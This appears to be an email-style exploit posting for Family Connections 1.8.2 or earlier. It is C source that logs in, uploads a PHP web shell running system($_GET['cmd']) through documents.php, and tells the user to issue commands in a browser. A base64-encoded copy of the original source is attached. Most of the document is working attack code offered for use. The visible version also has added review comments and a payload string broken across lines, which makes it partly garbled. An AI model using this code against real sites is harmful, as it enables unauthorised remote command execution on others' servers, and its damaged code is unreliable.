
Family Connections <= 1.8.2 - Remote Shell Upload Exploit






--001636c5a4357621fd0466a8d305
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

/*

	Family Connections <= 1.8.2 - Remote Shell Upload Exploit
	
	Author: Salvatore "drosophila" Fresta
	
Contact: drosophilaxxx@gmail.com 
	
	Date: 3 April 2009

	The following software will upload a simple php shell.
	To execute remote commands, you must open the file
	using a browser.
	
	gcc rsue.c -o rsue
	
	./rsue localhost /fcms/ user password

	[*] Connecting...
	[+] Connected
	[*] Send login...
	[+] Login Successful
	[+] Uploading...
	[+] Shell uploaded
	[+] Connection closed
	
	Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands] 

*/	

#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

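/*
 * Open a TCP connection to server:port.
 *
 * server: hostname or dotted-quad, resolved with gethostbyname().
 * port:   TCP port in host byte order (0..65535).
 *
 * Returns a connected descriptor that the caller owns and must close(),
 * or -1 on a bad argument, resolution failure, socket() or connect()
 * failure. No descriptor is leaked on any failure path (the original
 * left the socket open when resolution or connect failed).
 */
int socket_connect(char *server, int port) {

	int fd;
	struct sockaddr_in sock;
	struct hostent *host;

	if(server == NULL || port < 0 || port > 65535) return -1;

	memset(&sock, 0, sizeof(sock));

	/* Resolve first so a lookup failure has nothing to clean up.
	 * gethostbyname() is obsolete and not thread-safe; it is kept only
	 * because the rest of the file already depends on <netdb.h>. */
	if(!(host = gethostbyname(server))) return -1;
	if(host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL
	   || host->h_length != (int) sizeof(sock.sin_addr)) return -1;

	sock.sin_family = AF_INET;
	sock.sin_port = htons((unsigned short) port);
	/* memcpy instead of *(struct in_addr *)h_addr: no aliasing or
	 * alignment assumptions about the resolver's buffer. */
	memcpy(&sock.sin_addr, host->h_addr_list[0], sizeof(sock.sin_addr));

	if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

	if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) {
		int saved = errno;   /* close() may overwrite errno */
		close(fd);
		errno = saved;
		return -1;
	}

	return fd;

}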

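/*
 * Write exactly `size` bytes from `buffer` to descriptor `socket`.
 *
 * A single write() on a stream socket may accept fewer bytes than
 * requested, so the call loops until everything has been written.
 * EINTR is retried; a zero-length write is treated as failure rather
 * than spinning.
 *
 * Returns 0 when all bytes were written (size 0 succeeds without
 * writing), -1 on a negative descriptor, a NULL buffer with size > 0,
 * or a write() error (errno is left as write() set it).
 */
int socket_send(int socket, char *buffer, size_t size) {

	size_t sent = 0;

	if(socket < 0) return -1;
	if(size > 0 && buffer == NULL) return -1;

	while(sent < size) {
		ssize_t n = write(socket, buffer + sent, size - sent);
		if(n <= 0) {
			if(n < 0 && errno == EINTR) continue;
			return -1;
		}
		sent += (size_t) n;
	}

	return 0;

}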

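/*
 * Read everything the peer sends on `socket` until it closes the
 * connection (read() returns 0) or, when tout > 0, until no data has
 * arrived for `tout` seconds.
 *
 * socket: connected descriptor (must be below FD_SETSIZE for select()).
 * tout:   idle timeout in seconds; <= 0 blocks until the peer closes.
 *
 * Returns a heap-allocated, NUL-terminated copy of the received bytes
 * (an empty string if nothing arrived); the caller must free() it.
 * Returns NULL on a bad descriptor, allocation failure, or a
 * select()/read() error, and in that case nothing is leaked.
 *
 * Callers inspect the result with strstr(), so an embedded NUL in the
 * response ends what they can see; the total length is not reported.
 *
 * Fixes relative to the original: the zero-byte calloc() and the
 * strlen() on an unterminated 1024-byte chunk (out-of-bounds reads), the
 * realloc() size that omitted the terminator (heap overflow on the
 * following strncat), the per-iteration leak of `tmp`, the realloc()
 * result overwriting the only pointer on failure, and the fd_set /
 * timeval being reused after select() had modified them.
 */
char *socket_receive(int socket, int tout) {

	char *buffer, *grown;
	char tmp[1024];
	size_t len = 0;

	if(socket < 0 || socket >= FD_SETSIZE) return NULL;

	/* One byte so the result is a valid empty string even if the
	 * peer sends nothing. */
	if(!(buffer = calloc(1, 1))) return NULL;

	while (1) {
		fd_set input;
		struct timeval timeout, *tp = NULL;
		int ret;
		ssize_t byte;

		/* select() clears descriptors that are not ready and (on
		 * Linux) decrements the timeout, so both are rebuilt every
		 * iteration instead of once before the loop. */
		FD_ZERO(&input);
		FD_SET(socket, &input);
		if(tout > 0) {
			timeout.tv_sec  = tout;
			timeout.tv_usec = 0;
			tp = &timeout;
		}

		ret = select(socket + 1, &input, NULL, NULL, tp);
		if(ret < 0) {
			if(errno == EINTR) continue;
			free(buffer);
			return NULL;
		}
		if(!ret) break;   /* idle timeout: return what arrived so far */

		byte = read(socket, tmp, sizeof tmp);
		if(byte < 0) {
			if(errno == EINTR) continue;
			free(buffer);
			return NULL;
		}
		if(!byte) break;  /* peer closed the connection */

		/* Grow by the byte count (the chunk is not NUL-terminated and
		 * may itself contain NULs) plus room for the terminator, and
		 * keep the old pointer alive if realloc() fails. */
		if(!(grown = realloc(buffer, len + (size_t) byte + 1))) {
			free(buffer);
			return NULL;
		}
		buffer = grown;
		memcpy(buffer + len, tmp, (size_t) byte);
		len += (size_t) byte;
		buffer[len] = '\0';
	}

	return buffer;

}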

/*
 * Print the banner and the command-line synopsis to stdout.
 * bn: program name (argv[0]); it is substituted into both the usage
 *     and the example line.
 */
void usage(char *bn) {

	/* Fixed banner first, then the two lines that mention the program name. */
	fputs("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
	      "Author: Salvatore \"drosophila\" Fresta\n\n", stdout);
	printf("usage: %s    \n", bn);
	printf("example: %s localhost /fcms/ admin 123456\n\n", bn);

}

/*
 * Entry point. Arguments (see usage()): argv[1] host, argv[2] path prefix,
 * argv[3] user, argv[4] password. Two separate TCP connections to port 80
 * are made: a login POST to index.php whose response is checked for
 * "Login Successful" and mined for a PHPSESSID cookie, then a multipart
 * POST of `code` to documents.php whose response is checked for
 * "Uploaded Successfully".
 *
 * NOTE(review): as printed on this page the `code` literal is split
 * across a line break (extraction damage), so this block does not
 * compile as shown.
 *
 * NOTE(review): defects in the visible code, left unchanged here:
 *  - `buffer` is sized from `code` and the four argv lengths plus 200
 *    bytes, but the second sprintf() also inserts `session`, which is
 *    taken verbatim from the server's response and is not bounded by
 *    that size. A server returning a long cookie line can overflow the
 *    heap buffer and crash (or worse) this client; size the buffer after
 *    `session` is known, or use snprintf() and check for truncation.
 *  - Both sprintf() calls pass a size_t (strlen) to "%d"; use "%zu", or
 *    the Content-Length printed is wrong/UB on 64-bit targets.
 *  - `session` is NULL when the response has no "PHPSESSID";
 *    strtok(NULL, ";") then walks stale static state and "%s" with a
 *    NULL pointer is undefined. Check `session` before the strtok() and
 *    the second sprintf().
 *  - The first descriptor `sd` is overwritten by the second
 *    socket_connect() without close(), and `rec` from socket_receive()
 *    is never freed (both leak for the life of the process).
 *  - Success is judged by substring match on the response body, so the
 *    reported outcome presumably reflects only what the server echoed
 *    and not the actual result — confirm against the application.
 */
int main(int argc, char *argv[]) {
	
	int sd;
	char code[] = "--AaB03x\r\n"
					"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
					"Content-Type: text/plain\r\n"
					"\r\n"
					"\"; system($_GET['cmd']); echo \"
\"?>\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"desc\"\r\n" "\r\n" "description\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"submitadd\"\r\n" "\r\n" "Submit\r\n" "--AaB03x--\r\n", *buffer = NULL, *rec = NULL, *session = NULL; if(argc < 5) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) { perror("calloc"); return -1; } sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n" "Host: %s\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]); printf("\n[*] Connecting..."); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Connected" "\n[*] Send login..."); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Login Successful")) { printf("\n[-] Login Incorrect!\n\n"); free(buffer); close(sd); return -1; } session = strstr(rec, "PHPSESSID"); session = strtok(session, ";"); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Login Successful" "\n[+] Uploading..."); sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: %s\r\n" "Content-type: multipart/form-data, boundary=AaB03x\r\n" "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Uploaded Successfully")) { printf("\n[-] 
Upload failed!\n\n"); free(buffer); close(sd); return -1; } free(buffer); close(sd); printf("\n[+] Shell uploaded" "\n[+] Connection closed\n\n" "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]); return 0; } -- Salvatore "drosophila" Fresta CWNP444351 --001636c5a4357621fd0466a8d305 Content-Type: application/octet-stream; name="rsue.c" Content-Disposition: attachment; filename="rsue.c" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ft32rati0 LyoKCglGYW1pbHkgQ29ubmVjdGlvbnMgPD0gMS44LjIgLSBSZW1vdGUgU2hlbGwgVXBsb2FkIEV4 cGxvaXQKCQoJQXV0aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQoJCglDb250YWN0 OiBkcm9zb3BoaWxheHh4QGdtYWlsLmNvbQoJCglEYXRlOiAzIEFwcmlsIDIwMDkKCglUaGUgZm9s bG93aW5nIHNvZnR3YXJlIHdpbGwgdXBsb2FkIGEgc2ltcGxlIHBocCBzaGVsbC4KCVRvIGV4ZWN1 dGUgcmVtb3RlIGNvbW1hbmRzLCB5b3UgbXVzdCBvcGVuIHRoZSBmaWxlIAoJdXNpbmcgYSBicm93 c2VyLgoJCglnY2MgcnN1ZS5jIC1vIHJzdWUKCQoJLi9yc3VlIGxvY2FsaG9zdCAvZmNtcy8gdXNl ciBwYXNzd29yZAoKCVsqXSBDb25uZWN0aW5nLi4uCglbK10gQ29ubmVjdGVkCglbKl0gU2VuZCBs b2dpbi4uLgoJWytdIExvZ2luIFN1Y2Nlc3NmdWwKCVsrXSBVcGxvYWRpbmcuLi4KCVsrXSBTaGVs bCB1cGxvYWRlZAoJWytdIENvbm5lY3Rpb24gY2xvc2VkCgkKCU9wZW4geW91ciBicm93c2VyIGFu ZCBnbyB0byBodHRwOi8vbG9jYWxob3N0L2ZjbXMvZ2FsbGVyeS9kb2N1bWVudHMvc2hlbGwucGhw P2NtZD1bY29tbWFuZHNdCgoqLwkKCiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN0ZGxp Yi5oPgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8 c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8dW5pc3RkLmg+ CiNpbmNsdWRlIDxuZXRkYi5oPgoKaW50IHNvY2tldF9jb25uZWN0KGNoYXIgKnNlcnZlciwgaW50 IHBvcnQpIHsKCglpbnQgZmQ7CglzdHJ1Y3Qgc29ja2FkZHJfaW4gc29jazsKCXN0cnVjdCBob3N0 ZW50ICpob3N0OwoJCgltZW1zZXQoJnNvY2ssIDAsIHNpemVvZihzb2NrKSk7CgkKCWlmKChmZCA9 IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkpIDwgMCkgcmV0dXJuIC0xOwoJCglzb2Nr LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwoJc29jay5zaW5fcG9ydCA9IGh0b25zKHBvcnQpOwoJCglp ZighKGhvc3Q9Z2V0aG9zdGJ5bmFtZShzZXJ2ZXIpKSkgcmV0dXJuIC0xOwoJCglzb2NrLnNpbl9h 
ZGRyID0gKigoc3RydWN0IGluX2FkZHIgKilob3N0LT5oX2FkZHIpOwoJCglpZihjb25uZWN0KGZk LCAoc3RydWN0IHNvY2thZGRyICopICZzb2NrLCBzaXplb2Yoc29jaykpIDwgMCkgcmV0dXJuIC0x OwoJCglyZXR1cm4gZmQ7CiAgIAp9CgppbnQgc29ja2V0X3NlbmQoaW50IHNvY2tldCwgY2hhciAq YnVmZmVyLCBzaXplX3Qgc2l6ZSkgewoJCglpZihzb2NrZXQgPCAwKSByZXR1cm4gLTE7CgoJcmV0 dXJuIHdyaXRlKHNvY2tldCwgYnVmZmVyLCBzaXplKSA8IDAgPyAtMSA6IDA7CgkKfQoKY2hhciAq c29ja2V0X3JlY2VpdmUoaW50IHNvY2tldCwgaW50IHRvdXQpIHsKCglmZF9zZXQgaW5wdXQ7Cglp bnQgcmV0LCBieXRlOwoJY2hhciAqYnVmZmVyLCAqdG1wOwoJc3RydWN0IHRpbWV2YWwgdGltZW91 dDsKCQoJRkRfWkVSTygmaW5wdXQpOwoJRkRfU0VUKHNvY2tldCwgJmlucHV0KTsKCQoJaWYodG91 dCA+IDApIHsKCQkJdGltZW91dC50dl9zZWMgID0gdG91dDsKCQkJdGltZW91dC50dl91c2VjID0g MDsKCX0KCQoJaWYoc29ja2V0IDwgMCkgcmV0dXJuIE5VTEw7CgkKCWlmKCEoYnVmZmVyID0gKGNo YXIgKikgY2FsbG9jICgwLCBzaXplb2YgKGNoYXIpKSkpIHJldHVybiBOVUxMOwoJCgl3aGlsZSAo MSkgewoJCgkJaWYodG91dCA+IDApCgkJCXJldCA9IHNlbGVjdChzb2NrZXQgKyAxLCAmaW5wdXQs IE5VTEwsIE5VTEwsICZ0aW1lb3V0KTsKCWVsc2UKCQkJcmV0ID0gc2VsZWN0KHNvY2tldCArIDEs ICZpbnB1dCwgTlVMTCwgTlVMTCwgTlVMTCk7CgkKCWlmICghcmV0KSBicmVhazsKCWlmIChyZXQg PCAwKSByZXR1cm4gTlVMTDsKCQoJaWYoISh0bXAgPSAoY2hhciAqKSBjYWxsb2MgKDEwMjQsIHNp emVvZiAoY2hhcikpKSkgcmV0dXJuIE5VTEw7CgkKCWlmICgoYnl0ZT1yZWFkKHNvY2tldCwgdG1w LCAxMDI0KSkgPCAwKSByZXR1cm4gTlVMTDsKCQoJCWlmKCFieXRlKSBicmVhazsKCQoJaWYoIShi dWZmZXIgPSAoY2hhciAqKSByZWFsbG9jKGJ1ZmZlciwgc3RybGVuIChidWZmZXIpICsgc3RybGVu ICh0bXApKSkpIHJldHVybiBOVUxMOwoJCglzdHJuY2F0KGJ1ZmZlciwgdG1wLCBzdHJsZW4oYnVm ZmVyKStzdHJsZW4odG1wKSk7CgkKCX0KCQoJcmV0dXJuIGJ1ZmZlcjsKICAgCn0KCnZvaWQgdXNh Z2UoY2hhciAqYm4pIHsKCglwcmludGYoIlxuRmFtaWx5IENvbm5lY3Rpb25zIDw9IDEuOC4yIC0g UmVtb3RlIFNoZWxsIFVwbG9hZCBFeHBsb2l0XG4iCgkJCSJBdXRob3I6IFNhbHZhdG9yZSBcImRy b3NvcGhpbGFcIiBGcmVzdGFcblxuIgoJCQkidXNhZ2U6ICVzIDxzZXJ2ZXI+IDxwYXRoPiA8dXNl cm5hbWU+IDxwYXNzd29yZD5cbiIKCQkJImV4YW1wbGU6ICVzIGxvY2FsaG9zdCAvZmNtcy8gYWRt aW4gMTIzNDU2XG5cbiIsIGJuLCBibik7CQoKfQoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFy 
Z3ZbXSkgewoJCglpbnQgc2Q7CgljaGFyIGNvZGVbXSA9ICItLUFhQjAzeFxyXG4iCgkJCQkJIkNv bnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT1cImRvY1wiOyBmaWxlbmFtZT1cInNo ZWxsLnBocFwiXHJcbiIKCQkJCQkiQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluXHJcbiIKCQkJCQki XHJcbiIKCQkJCQkiPD9waHAgZWNobyBcIjxwcmU+XCI7IHN5c3RlbSgkX0dFVFsnY21kJ10pOyBl Y2hvIFwiPC9wcmU+XCI/PlxyXG4iCgkJCQkJIi0tQWFCMDN4XHJcbiIKCQkJCQkiQ29udGVudC1E aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPVwiZGVzY1wiXHJcbiIKCQkJCQkiXHJcbiIKCQkJ CQkiZGVzY3JpcHRpb25cclxuIgoJCQkJCSItLUFhQjAzeFxyXG4iCgkJCQkJIkNvbnRlbnQtRGlz cG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT1cInN1Ym1pdGFkZFwiXHJcbiIKCQkJCQkiXHJcbiIK CQkJCQkiU3VibWl0XHJcbiIKCQkJCQkiLS1BYUIwM3gtLVxyXG4iLAoJCSpidWZmZXIgPSBOVUxM LAoJCSpyZWMgPSBOVUxMLAoJCSpzZXNzaW9uID0gTlVMTDsKCQkKCWlmKGFyZ2MgPCA1KSB7CgkJ dXNhZ2UoYXJndlswXSk7CgkJcmV0dXJuIC0xOwoJfQoJCglpZighKGJ1ZmZlciA9IChjaGFyICop Y2FsbG9jKDIwMCtzdHJsZW4oY29kZSkrc3RybGVuKGFyZ3ZbMV0pK3N0cmxlbihhcmd2WzJdKStz dHJsZW4oYXJndlszXSkrc3RybGVuKGFyZ3ZbNF0pLCBzaXplb2YoY2hhcikpKSkgewoJCXBlcnJv cigiY2FsbG9jIik7CgkJcmV0dXJuIC0xOwoJfQoJCglzcHJpbnRmKGJ1ZmZlciwgIlBPU1QgJXNp bmRleC5waHAgSFRUUC8xLjFcclxuIgoJCQkJCSJIb3N0OiAlc1xyXG4iCgkJCQkJIkNvbnRlbnQt VHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIKCQkJCQkiQ29udGVu dC1MZW5ndGg6ICVkXHJcblxyXG51c2VyPSVzJnBhc3M9JXMmc3VibWl0PUxvZ2luIiwgYXJndlsy XSwgYXJndlsxXSwgKHN0cmxlbihhcmd2WzRdKStzdHJsZW4oYXJndlszXSkrMjQpLCBhcmd2WzNd LCBhcmd2WzRdKTsKCQoJCQkJCQoJcHJpbnRmKCJcblsqXSBDb25uZWN0aW5nLi4uIik7CgkKCWlm KChzZCA9IHNvY2tldF9jb25uZWN0KGFyZ3ZbMV0sIDgwKSkgPCAwKSB7CgkJcHJpbnRmKCJbLV0g Q29ubmVjdGlvbiBmYWlsZWQhXG5cbiIpOwoJCWZyZWUoYnVmZmVyKTsKCQlyZXR1cm4gLTE7Cgl9 CgkKCXByaW50ZigiXG5bK10gQ29ubmVjdGVkIgoJCQkiXG5bKl0gU2VuZCBsb2dpbi4uLiIpOwoJ CglpZihzb2NrZXRfc2VuZChzZCwgYnVmZmVyLCBzdHJsZW4oYnVmZmVyKSkgPCAwKSB7CgkJcHJp bnRmKCJbLV0gU2VuZGluZyBmYWlsZWQhXG5cbiIpOwoJCWZyZWUoYnVmZmVyKTsKCQljbG9zZShz ZCk7CgkJcmV0dXJuIC0xOwoJfQoJCglpZighKHJlYyA9IHNvY2tldF9yZWNlaXZlKHNkLCAwKSkp 
IHsKCQlwcmludGYoIlstXSBSZWNlaXZlIGZhaWxlZCFcblxuIik7CgkJZnJlZShidWZmZXIpOwoJ CWNsb3NlKHNkKTsKCQlyZXR1cm4gLTE7Cgl9CgkKCWlmKCFzdHJzdHIocmVjLCAiTG9naW4gU3Vj Y2Vzc2Z1bCIpKSB7CgkJcHJpbnRmKCJcblstXSBMb2dpbiBJbmNvcnJlY3QhXG5cbiIpOwoJCWZy ZWUoYnVmZmVyKTsKCQljbG9zZShzZCk7CgkJcmV0dXJuIC0xOwoJfQoJCglzZXNzaW9uID0gc3Ry c3RyKHJlYywgIlBIUFNFU1NJRCIpOwoJc2Vzc2lvbiA9IHN0cnRvayhzZXNzaW9uLCAiOyIpOwoJ CglpZigoc2QgPSBzb2NrZXRfY29ubmVjdChhcmd2WzFdLCA4MCkpIDwgMCkgewoJCXByaW50Zigi Wy1dIENvbm5lY3Rpb24gZmFpbGVkIVxuXG4iKTsKCQlmcmVlKGJ1ZmZlcik7CgkJcmV0dXJuIC0x OwoJfQoJCglwcmludGYoIlxuWytdIExvZ2luIFN1Y2Nlc3NmdWwiCgkJCSJcblsrXSBVcGxvYWRp bmcuLi4iKTsKCQoJc3ByaW50ZihidWZmZXIsICJQT1NUICVzZG9jdW1lbnRzLnBocCBIVFRQLzEu MVxyXG4iCgkJCQkJIkhvc3Q6ICVzXHJcbiIKCQkJCQkiQ29va2llOiAlc1xyXG4iCgkJCQkJIkNv bnRlbnQtdHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YSwgYm91bmRhcnk9QWFCMDN4XHJcbiIKCQkJ CQkiQ29udGVudC1MZW5ndGg6ICVkXHJcblxyXG4lcyIsIGFyZ3ZbMl0sIGFyZ3ZbMV0sIHNlc3Np b24sIHN0cmxlbihjb2RlKSwgY29kZSk7CgkKCWlmKHNvY2tldF9zZW5kKHNkLCBidWZmZXIsIHN0 cmxlbihidWZmZXIpKSA8IDApIHsKCQlwcmludGYoIlstXSBTZW5kaW5nIGZhaWxlZCFcblxuIik7 CgkJZnJlZShidWZmZXIpOwoJCWNsb3NlKHNkKTsKCQlyZXR1cm4gLTE7Cgl9CgkKCWlmKCEocmVj ID0gc29ja2V0X3JlY2VpdmUoc2QsIDApKSkgewoJCXByaW50ZigiWy1dIFJlY2VpdmUgZmFpbGVk IVxuXG4iKTsKCQlmcmVlKGJ1ZmZlcik7CgkJY2xvc2Uoc2QpOwoJCXJldHVybiAtMTsKCX0KCQoJ aWYoIXN0cnN0cihyZWMsICJVcGxvYWRlZCBTdWNjZXNzZnVsbHkiKSkgewoJCXByaW50ZigiXG5b LV0gVXBsb2FkIGZhaWxlZCFcblxuIik7CgkJZnJlZShidWZmZXIpOwoJCWNsb3NlKHNkKTsKCQly ZXR1cm4gLTE7Cgl9CgkKCWZyZWUoYnVmZmVyKTsKCWNsb3NlKHNkKTsKCQoJcHJpbnRmKCJcblsr XSBTaGVsbCB1cGxvYWRlZCIKCQkJIlxuWytdIENvbm5lY3Rpb24gY2xvc2VkXG5cbiIKCQkJIk9w ZW4geW91ciBicm93c2VyIGFuZCBnbyB0byBodHRwOi8vJXMlc2dhbGxlcnkvZG9jdW1lbnRzL3No ZWxsLnBocD9jbWQ9W2NvbW1hbmRzXVxuXG4iLCBhcmd2WzFdLCBhcmd2WzJdKTsKCQoJcmV0dXJu IDA7CgkKfQoJ --001636c5a4357621fd0466a8d305--
